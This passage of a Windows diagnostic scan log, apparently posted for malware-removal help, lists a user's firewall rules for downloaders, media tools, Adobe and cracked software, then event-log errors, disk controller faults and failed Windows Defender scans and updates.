FirewallRules: [{828F9004-D6AD-424B-B9AF-358E09E6D59D}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\aria2c.exe
FirewallRules: [{61951D9D-D9E8-4098-BBC4-DCE2C15E0A37}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\qtCopy.exe
FirewallRules: [{9D7ECD7E-4081-463D-A7A1-66901FB4631A}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\qtCopy.exe
FirewallRules: [TCP Query User{0D97D9AA-F1E5-482A-B3FF-B4CBC63122EE}C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [UDP Query User{4D865EC7-719F-465D-8376-EDE19BB17CB9}C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [TCP Query User{C62A3DCA-EF3A-4BFA-AD77-530BA8EB30A7}E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Block) E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [UDP Query User{6002DF46-D0C0-4D0D-A7CF-623A681197EA}E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Block) E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [TCP Query User{BB8345BC-ECD7-4471-B25A-9D853E961F5A}C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [UDP Query User{7FC4D6EF-81C4-458F-9B40-AD7B400A1E4C}C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [TCP Query User{BC5A050A-5C0E-454E-A679-0B6F74B6AEEB}E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [UDP Query User{06AE2A0A-79C9-42E3-8D44-832B7E14FA66}E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [{C1CDE395-B54A-41F5-8253-D1C74388EEBD}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe
FirewallRules: [{4C545804-7C07-4B6F-B73F-E447437D340D}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe
FirewallRules: [TCP Query User{F025769D-FD8B-45D2-A905-50841DDDB59B}C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe] => (Allow) C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe
FirewallRules: [UDP Query User{B22891B0-0B73-4385-81F5-B178F881D091}C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe] => (Allow) C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe
FirewallRules: [{A879E9E7-D547-4AB8-9183-31F47DA82E93}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsb7AC7.tmp\CnetInstaller-75409715.exe
FirewallRules: [{5452DD3B-F6A9-4B86-856D-2147672734F5}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsb7AC7.tmp\CnetInstaller-75409715.exe
FirewallRules: [{2029387B-0B9A-48C5-8D70-D9624A75818D}] => (Allow) C:\Program File (x86) Free Video To MP3 Converter DVDVideoSoft Three UpDate\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{23995299-1FD2-4CFE-B8AF-2086099394E8}] => (Allow) C:\Program File (x86) Free Video To MP3 Converter DVDVideoSoft Three UpDate\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{0DD782B8-3E36-4357-B248-4A58956BA95E}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsm3630.tmp\CnetInstaller-10444774.exe
FirewallRules: [{3435D53E-9FD6-4668-BF9A-6D30B08E5FEE}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsm3630.tmp\CnetInstaller-10444774.exe
FirewallRules: [{FF5E24B4-1562-4D0E-B0F0-B909F14E18B7}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsqF114.tmp\CnetInstaller-10444774.exe
FirewallRules: [{FBB98ABC-9569-4C9B-ACD7-72394C22E85A}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsqF114.tmp\CnetInstaller-10444774.exe
FirewallRules: [{7D2A9822-B4AC-4027-8630-BBA86B2B3250}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsnD7EB.tmp\CnetInstaller-75449917.exe
FirewallRules: [{B61AADD3-2D37-49CE-8846-3DBE50FB4B8A}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsnD7EB.tmp\CnetInstaller-75449917.exe
FirewallRules: [{2DA2B986-7667-4D2C-9E85-C2F81B954DE6}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsw2542.tmp\CnetInstaller-10875190.exe
FirewallRules: [{2FE73EE5-6FB3-4DC8-9CFF-B1AD59033BDD}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsw2542.tmp\CnetInstaller-10875190.exe
FirewallRules: [TCP Query User{5AC03A41-337A-4D35-8475-DBF7FCF3718C}C:\program file (x86) vlc media player videolan\vlc\vlc.exe] => (Block) C:\program file (x86) vlc media player videolan\vlc\vlc.exe
FirewallRules: [UDP Query User{3A9F9831-57E1-4FDB-984D-672AA8256557}C:\program file (x86) vlc media player videolan\vlc\vlc.exe] => (Block) C:\program file (x86) vlc media player videolan\vlc\vlc.exe
FirewallRules: [{57579DAD-B0A7-4600-BACB-ACFBD0BF582E}] => (Allow) C:\Program File (x86) 4kYoutubetomp3TWO\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{20046B7C-7FC0-4DAC-81CD-B157DC013E33}] => (Allow) C:\Program File (x86) 4kYoutubetomp3TWO\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [TCP Query User{210A33E9-6B2B-44CF-BCF6-D34BC763A901}C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [UDP Query User{BC1DE14B-4640-475C-A83B-879941C715F5}C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [{207663F4-14AA-4B8C-8B75-0E34AECA606F}] => (Block) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [{5F89233A-ABDC-4FF1-9263-2D96AFE62121}] => (Block) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [TCP Query User{803AE086-7E6A-48E0-8802-785AA4FC4A01}C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe] => (Allow) C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe
FirewallRules: [UDP Query User{DD0732C4-EE26-4E6D-9566-D42C50E770DC}C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe] => (Allow) C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe
FirewallRules: [{92D3E127-A9C9-4A57-A4DE-C37C30EEC069}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\Video Download Capture.exe
FirewallRules: [{6D97C59F-C2D5-4B5F-A2EB-62DED9A63774}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\Video Download Capture.exe
FirewallRules: [{595BE6ED-4AE7-4E50-8492-81EF52DC503B}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftSrv.dll
FirewallRules: [{51406614-36DB-4932-854C-7354C320CCCE}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftSrv.dll
FirewallRules: [{0FD1A6F0-6892-4528-8D02-6DA308CE78B8}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDump.dll
FirewallRules: [{F5C52100-551E-41EB-9F6B-22785A10B72E}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDump.dll
FirewallRules: [{F90CFC89-D1E5-47FE-810D-4C2A003E3EC4}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftAC.dll
FirewallRules: [{B4D1EF72-3517-40C5-A216-D67E59703BD4}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftAC.dll
FirewallRules: [{95D8704A-2EE2-4ABF-A286-E107F9FE797F}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftPlayer.dll
FirewallRules: [{4819C0F7-D28C-465D-9F1B-E02D925E86AE}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftPlayer.dll
FirewallRules: [{FC9BC8BE-3785-41F0-9673-77798F53F411}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDownloaderHelp.dll
FirewallRules: [{97D423F4-0FDF-4C9C-9062-3118615A659E}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDownloaderHelp.dll
FirewallRules: [{F3617F33-975E-49A1-82F7-525FC3550128}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftHDSDump.dll
FirewallRules: [{A279D673-8345-423B-A713-D33AE6388178}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftHDSDump.dll
FirewallRules: [{2AC43D62-7AC9-47C0-9BAF-E92B1B7BBA30}] => (Allow) C:\Users\Dan\AppData\Local\Temp\Andy_45.5_x64\Setup.exe
FirewallRules: [{C12F076D-5E2B-450E-91A2-3D08D18E1937}] => (Allow) C:\Users\Dan\AppData\Local\Temp\Andy_45.5_x64\Setup.exe
FirewallRules: [{3D3CF842-8298-442A-B9C9-A5399B012E71}] => (Allow) C:\Program Files\Andy\andy.exe
FirewallRules: [{C31226E6-F861-4DEA-B2FD-2634BE6F0129}] => (Allow) C:\Program Files\Andy\andy.exe
FirewallRules: [{D12533D4-1609-4FAF-85BD-3A23601A19D7}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{C02EE326-2CB8-4B8B-85EE-B9EF5101D2FC}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{E6F43DE1-5773-4F5C-997C-8F9A152B8CC6}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{4A1A6E79-2801-44AC-93C6-A5698676BF58}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{447CC466-EC34-4DCC-9474-38A417083D49}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
FirewallRules: [{B6E8D305-52B5-45E2-8C5A-2EE37A8ADB44}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
FirewallRules: [{0649CB28-67B5-48B4-B97E-CDA231670A45}] => (Allow) C:\Program Files\Andy\HandyAndy.exe
FirewallRules: [{5BAD7087-DE25-4030-A16A-578CD107BD81}] => (Allow) C:\Program Files\Andy\HandyAndy.exe
FirewallRules: [{BF1E40F5-A2D7-4946-895B-E0067521547F}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser - NEW Ver\Winamp\winamp.exe
FirewallRules: [{17ED7A00-1D80-4074-B1AB-25880A7BB6B6}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser - NEW Ver\Winamp\winamp.exe
FirewallRules: [TCP Query User{396BBCA8-02CB-4338-8B42-915ECADCD922}C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [UDP Query User{73E87333-E910-4EEC-804C-17612FDD0764}C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [{9E3E9781-622A-4CDF-A7EF-F851961BEA19}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [{7C52A72D-17FC-484E-A819-81F527082F0F}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\Resolve.exe
FirewallRules: [{5B94E67F-A6E7-4C37-B249-3CED37E49F0D}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\bmdpaneld.exe
FirewallRules: [{BA3F2295-A446-4372-A933-C67E6917CAA9}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\JLCooperPanelDaemon.exe
FirewallRules: [{AF2811BE-4318-4F7F-8F60-8E10AD92B8F2}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\EuphonixPanelDaemon.exe
FirewallRules: [{9D04EBDE-0FDE-4918-94E4-D40C3C002C6F}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\TangentPanelDaemon.exe
FirewallRules: [{BDA720FB-BED0-4342-84C3-1AF5017ECCAA}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\ElementsPanelDaemon.exe
FirewallRules: [{56DE631C-A030-4DF6-B707-2D24656517FF}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\DPDecoder.exe
FirewallRules: [{B0D56FFA-C1C5-488E-B442-2038AC05A5A6}] => (Allow) C:\ProgramData\Blackmagic Design\DaVinci Resolve\Support\QtDecoder\QTDecoder.exe
FirewallRules: [TCP Query User{80D1B33D-1849-4BEE-B7BB-78C9D2D3F544}C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe] => (Block) C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe
FirewallRules: [UDP Query User{B40DADB6-9E25-4951-B741-8458BE0396EE}C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe] => (Block) C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe
FirewallRules: [{9B19D861-CA78-446B-AD40-2E9AA11FDFB5}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\VideoEditor.exe
FirewallRules: [{9A1FF358-15BA-4495-8972-7D4A585582FE}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\VideoEditor.exe
FirewallRules: [{DFD16930-C6D4-42A7-8594-A07EAE59D209}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\Updater.exe
FirewallRules: [{96FED481-82D0-450B-85C3-36735EB1549F}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\Updater.exe
FirewallRules: [{17F50D30-FD50-46D0-BEE3-81847CF40C64}] => (Allow) 㩃停潲牧浡䘠汩獥⠠㡸⤶睜湩晤湩層楷摮楦摮攮數
FirewallRules: [{96606CA1-E101-4434-AE0C-6C99B774D1CA}] => (Allow) 㩃停潲牧浡䘠汩獥⠠㡸⤶睜湩晤湩層楷摮楦摮⹟硥e
FirewallRules: [{D61EF620-8F0B-40A6-9BB7-E836DA310B7C}] => (Block) %SystemDrive%\Program File (x86) Adobe Premiere Pro CC - 2 - (Program)\Adobe Premiere Pro CC 2015\Adobe Premiere Pro.exe
FirewallRules: [{91606396-6288-43E6-AE6F-EEB421C75181}] => (Block) %SystemDrive%\Program File (x86) Adobe Premiere Pro CC - 2 - (Program)\Adobe Premiere Pro CC 2015\Adobe Premiere Pro.exe
FirewallRules: [{807550B5-7265-4327-9B16-266D34A7742C}] => (Block) %SystemDrive%\Program File (x86) Adobe After Effects CS6 - Video EfXs Program 2\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{EE7BB404-A2CF-4E23-A355-EA7C2D953145}] => (Block) %SystemDrive%\Program File (x86) Adobe After Effects CS6 - Video EfXs Program 2\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{7C716CAC-0CA5-496D-B6B1-DBB04F82E573}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{047E31DF-A255-4F4C-9FE9-45DD54A3AB3B}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{B06B32BA-F38C-4C17-B422-99E7605B0063}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{E511541B-CD44-4376-A542-B6A6578FA8EE}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{068BAA54-B58F-43B6-8ADB-31E4DEE03ACC}] => (Block) %ProgramFiles%\Adobe\Adobe Media Encoder CC 2015.3\Adobe Media Encoder.exe
FirewallRules: [{B44756B4-DFCA-4CC9-953C-CCE8AE6CC11A}] => (Block) %ProgramFiles%\Adobe\Adobe Media Encoder CC 2015.3\Adobe Media Encoder.exe
FirewallRules: [{3C331E6B-E428-4D0C-BEA4-0FA06032B9D0}] => (Block) %ProgramFiles% (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{D450C4CE-50CA-4D6B-A47C-AF19379507B1}] => (Block) %ProgramFiles% (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{640DFB21-833E-420D-B80D-AC0DD899B614}] => (Allow) C:\Program Files (x86)\SrpnFiles\SrpnFiles.exe
FirewallRules: [{6CAA584E-EA21-4F97-9554-1E5312569977}] => (Allow) C:\Program Files (x86)\SrpnFiles\SrpnFiles.exe
FirewallRules: [{099E93F9-CFBA-4E6D-A852-0EFDF6E69C77}] => (Allow) C:\Program Files (x86)\SrpnFiles\downloader.exe
FirewallRules: [{10B74A86-9FC5-4D84-955B-4B2C2FAADC83}] => (Allow) C:\Program Files (x86)\SrpnFiles\downloader.exe
FirewallRules: [{65FA2FF6-971C-44E8-8D5E-C565539E0181}] => (Block) %SystemDrive%\Program File (x86) CrazyTalk Animator 2 Pipeline 8.03.1620.1 + Crack [SadeemPC]\CrazyTalk Animator 2\CrazyTalk Animator 2\CrazyTalkAnimator.exe
FirewallRules: [{88078A39-6DBF-4310-9720-BC7A9811094B}] => (Block) %SystemDrive%\Program File (x86) CrazyTalk Animator 2 Pipeline 8.03.1620.1 + Crack [SadeemPC]\CrazyTalk Animator 2\CrazyTalk Animator 2\CrazyTalkAnimator.exe
FirewallRules: [{5D12474E-76BE-4D8A-8BD7-4CECA0F32CFB}] => (Allow) C:\Users\Dan\AppData\Local\Kometa\Application\kometa.exe
FirewallRules: [{814CAEF2-ADD6-4507-BAE2-55F6820A7994}] => (Allow) 㩃停潲牧浡䘠汩獥⠠㡸⤶䝜湥牥捩桳楡汬屩敇敮楲獣慨汩楬攮數
FirewallRules: [{0E3753F1-E381-437A-BC70-0B47ECA113FA}] => (Allow) 㩃停潲牧浡䘠汩獥⠠㡸⤶䝜湥牥捩桳楡汬屩敇敮楲獣慨汩楬⹟硥e
FirewallRules: [{8269955E-0B8F-464C-B326-2023E770CABC}] => (Allow) C:\Program Files (x86)\Henwood\fontenot.exe
FirewallRules: [{3606180A-FA39-4B14-88F6-E879C8BB4B0B}] => (Allow) C:\Program Files (x86)\Police\fontenot.exe
FirewallRules: [{99FAD6CC-61D4-4806-B204-7F3641DDD7F3}] => (Block) %ProgramFiles% (x86)\FaceGen\Artist Pro\fgArtistPro.exe
FirewallRules: [{6CCE0F5A-ED5B-48E9-898C-B3168715BED1}] => (Block) %ProgramFiles% (x86)\FaceGen\Artist Pro\fgArtistPro.exe
FirewallRules: [TCP Query User{9536F0CC-5E66-46E8-805B-67D9697C530F}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{C5258519-221C-4A37-A687-51526258F672}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{5507329C-601E-4572-9AD8-6C16774E1ADC}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe
FirewallRules: [{187A8271-92D7-449D-8643-56ECD2671F9C}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{C260D9CD-8DD2-4B5A-8BDE-C4CFD01C9F25}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{DB1E8DAE-0016-43D8-BB69-DC8005FC9089}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{EA5A15E3-2AE2-47A4-AB76-6A52AAB47F97}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{31F2912A-119F-44BD-A9EB-53A4D506D23B}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Restore Points =========================
 
ATTENTION: System Restore is disabled
 
==================== Faulty Device Manager Devices =============
 
Name: 
Description: 
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (06/11/2018 09:42:03 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 7c4
 
Start Time: 01d401edd725fe22
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: ca66cabd-6de1-11e8-835b-10c37bbb446b
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (06/11/2018 08:58:06 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 894
 
Start Time: 01d401e7b235f644
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: a65dd9f3-6ddb-11e8-8359-10c37bbb446b
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (06/11/2018 08:45:56 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-19T00:45:56Z. Error Code: 0x80070020.
 
Error: (06/11/2018 08:45:44 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Windows Search Service failed to process the list of included and excluded locations with the error <20, 0x80070020, "">.
 
Error: (06/11/2018 08:45:26 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-19T00:45:26Z. Error Code: 0x80070020.
 
Error: (06/11/2018 08:44:56 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-19T00:44:56Z. Error Code: 0x80070020.
 
Error: (06/11/2018 08:44:26 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-19T00:44:25Z. Error Code: 0x80070020.
 
Error: (06/11/2018 08:43:55 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-19T00:43:55Z. Error Code: 0x80070020.
 
 
System errors:
=============
Error: (06/11/2018 09:55:02 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/11/2018 09:55:02 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/11/2018 09:55:02 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/11/2018 09:55:02 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/11/2018 09:55:02 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/11/2018 09:55:01 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/11/2018 09:55:01 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/11/2018 09:55:01 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
 
Windows Defender:
===================================
Date: 2015-02-02 09:49:52.792
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {4BF9AF7B-A43D-4E64-B277-DEFB56CDC0E3}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-02-02 08:06:18.260
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {16FD4F1F-550C-4A26-9400-0412629CFD5A}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-02-01 10:17:58.118
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {BADC4EF7-6BAD-444C-AB05-92085B6CF93D}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-02-01 08:23:26.263
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {C9B87AF6-96B3-4644-9422-EB0CED28391C}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-01-31 08:30:36.872
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {4D8C80CB-F50C-47EE-94E8-DC02EC0EE056}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-02-01 05:57:28.954
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 110.6.0.0
Update Source: Microsoft Malware Protection Center
Signature Type: Network Inspection System
Update Type: Full
Current Engine Version: 
Previous Engine Version: 2.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved 
 
Date: 2015-02-01 05:57:28.938
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.167.387.0
Update Source: Microsoft Malware Protection Center
Signature Type: AntiSpyware
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved 
 
Date: 2015-02-01 05:57:28.938
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.167.387.0
Update Source: Microsoft Malware Protection Center
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved 
 
Date: 2015-02-01 05:57:28.844
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.167.387.0
Update Source: Microsoft Update Server
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.10302.0
Error code: 0x8024402c
Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support. 
 
Date: 2015-01-30 05:22:07.607
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 110.6.0.0
Update Source: Microsoft Malware Protection Center
Signature Type: Network Inspection System
Update Type: Full
Current Engine Version: 
Previous Engine Version: 2.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved 
 
CodeIntegrity:
===================================
 
Date: 2018-06-11 21:40:11.899
Description: 
